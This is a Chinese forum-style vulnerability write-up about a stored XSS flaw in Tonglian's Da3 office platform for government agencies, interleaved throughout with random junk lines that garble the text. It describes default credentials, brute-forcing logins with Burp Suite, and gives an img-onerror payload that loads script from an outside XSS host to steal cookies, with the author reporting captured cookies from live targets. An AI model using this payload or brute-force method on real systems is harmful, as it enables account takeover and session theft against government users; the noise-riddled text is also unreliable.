$ J9 o. _" R* @( H! h8 O
1 F4 M# Z, H, g. N( d
同联Da3协同办公平台后台通用储存型xss漏洞
( G) s9 d! r) e) N G7 ?" o
3 _+ u7 m# {: d2 c. c
& b& b7 T. P) F: W 平台简介:$ v- y9 n! G8 c+ f4 B
6 C) w1 ?: ~! ~ : y0 {# q! v4 `
5 L: ?0 x0 ], g
* P D* r( }8 a( S
3 D- B' t" ]1 i+ e3 g. F$ x
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* @* [, o$ e1 _6 s+ l
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
& S, G1 z) x) Q5 J8 w' T
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 Q9 a7 k, ?! V7 H* e- z6 `
6 M; I( g& H1 ^/ Q t& Q/ K& L- C
- a) ]* K" j6 H3 s6 C 8 e' \' l' K) W3 C) M! H/ ]
0 \- v- {5 c/ S& }* k$ S
6 h: G3 n9 [9 @, L 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
, m Y& r& r, b; U! d
1 K! m2 z3 m; J/ M! j; l
& n6 q8 s3 v* C0 i0 {8 K1 y0 ?9 |
, `* a# [0 p$ Y5 ?
$ l7 ?$ @( r1 i4 e! T7 _0 ]
1 e$ v' `: G* l) w" n6 X" ]
http://1.1.1.1:7197/cap-aco/#(案例2-)8 Z. V2 W C3 K& g3 Q
4 V0 C, z+ X& D. M. t. ? {3 t. H
$ z' I s1 O! p) e, \& I http://www.XXOO.com (案例1-官网网站)* |( U3 W$ A0 O) Z$ Y) ?$ V8 Y) Y
4 A; S9 \1 L" | 0 p8 z% h) P, K
漏洞详情:, {: e) p$ x N H) ^% \
- P, p' Z. M$ R5 H) s: P
9 z6 R) K: Z3 u 案例一、
5 }! u) e8 s; Z: ~3 B& z
2 U# O7 w9 O* B: L5 a
$ c/ {. T1 n/ I! N3 L
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
1 B6 h7 O& G6 I6 L1 p/ r ~, \
- Y0 X5 @3 }) p
& Q( D8 V3 n; N; X7 }" F 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
! p0 k2 j9 g4 E) H4 t
. Z/ x& A- l1 Z7 }& d% H/ |
3 u: e3 T. e1 l# D' q/ I$ ?/ Q& k$ a1 e
0 I& A! F& x; Z U I" A
3 j7 c0 R1 ^/ @, Q! `
0 y0 o" Y; x& S& E9 |8 X: j' e @
8 d1 r+ B5 U: L
5 A, B/ N, g% V
/ E! {1 J% V* V* J! _0 Y status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: `) f1 h' w, L9 I4 D
M% o1 V2 R3 |( e- `* o) } 9 q' Q9 ?! Y2 C
) L& u0 G" @' F2 }% o
5 F K0 g1 U- k0 ?2 ~! }
6 o+ w. Q; j# L8 k3 }$ g2 o, f4 ^
; @$ G! w. O1 z9 g- e' E. V
$ s% z9 m- z$ Y1 v
$ e" `" p, ]7 {4 _6 Q
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
3 L+ h7 l( v) ?( h
1 _/ _7 B$ U/ F3 X+ P: t $ T' p, o' W! N; o
: {1 r8 o; n" J; w. w0 c
9 G; C4 X9 k6 w' q ' l+ e- }% M7 U2 c) H/ Q( i3 c
<img src=x# P* Y$ w q! u, i h% o1 p1 V: k
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: # D& z" J) X* P% {. i* X4 n
; v3 @6 F; B' t5 `; }" M
' {: b# |( H2 X( Q2 }8 ]
+ {6 ^! {9 g' r( T. t* {
- j" C+ O9 E d. V ^* G
6 a) B8 e! i R# r2 k 然后发送,接收cookie如图:
; F6 W4 z# y" m4 _' J0 S
4 ~; U* M! L4 b3 @ b
1 S r1 ?. f% Z$ Y' b
& W+ j5 v1 y; }) S+ J) @
0 k: u- a: P- P5 a. |7 I& v9 @
' n0 u: @. \+ Q
. }2 c" @% y3 c& z9 N! _$ F
0 g3 ?0 o/ k! Z- @
; K2 Q) h) x. h3 O. Y# n 0 r5 p9 G) U0 D3 l5 l) j
2 O( g6 T6 n+ w) R
& g$ \! g' l8 k! t9 }
: B2 i* E1 W9 G
+ P/ ^ a) H- k N( ]' z* B
0 w; [3 } Q3 t# g. R' x# d3 V+ i
+ e' I. a, X$ E9 m$ v
: r6 \2 u/ A, |1 J: m: W- ]
8 f, b& U8 e& _+ m2 }/ L
4 G% L0 t/ @3 g7 ]8 z1 ]( R
; U& z$ U% {0 G6 G# D7 E
, {- |5 L0 e' o/ b' G4 c
8 `) [: Y$ J/ a! C( ]
7 W# t8 @# Y( `3 E% _
3 h4 u% _$ N. u( l+ T: m 案例2、
/ \/ C7 o; f8 V2 }5 h5 F- ~
9 q: l) k- p ]9 k ) \, X3 Z- x+ h) L1 L
前面步骤都一样,下面看效果图: ! @6 s9 s% H/ r4 b7 P
8 S, f# i$ c2 \" M) A
* K( O/ r$ } l; r. @# r0 u
) z% t1 q4 f8 I) x) x
6 ?+ c! G; i' q b4 f8 H1 _ & I/ O- c. F5 K0 ~" d
; k3 F% r8 m z
2 c8 u. o# E1 B% r
" n. O b4 L. F3 n5 l& ~
( L; J/ C( H9 K8 Q/ ~
0 f( ~) l( K6 T/ r
; V) u: i! d% h5 `6 l( s" w
: `: M0 _( o# V) X( ^7 q
: F8 L, Q0 W. P8 H, ^
! v l; G" n+ m4 M
1 a+ A6 L- O9 f s
, Y/ Q0 i" k. K6 u4 W, |
3 D# S$ n" ^, a3 O8 H: z" j2 A- y" I
6 H; K/ i Q' u1 j' F
7 E/ }' D4 }/ [3 R2 b
' F0 G, N$ j9 s3 N, B% M' _
. M, z9 R) ^4 k6 y3 i
1 a6 [2 e8 E. \4 F% ~ D# G
# x" V; I4 H# }& n0 O+ C/ a) }
1 k- j* W( x4 g- h
: T) G b; N% B
L) B! B( `9 a3 B
: z8 r; ^# \& X& f3 n% Q
+ G; D2 }* u* y# ~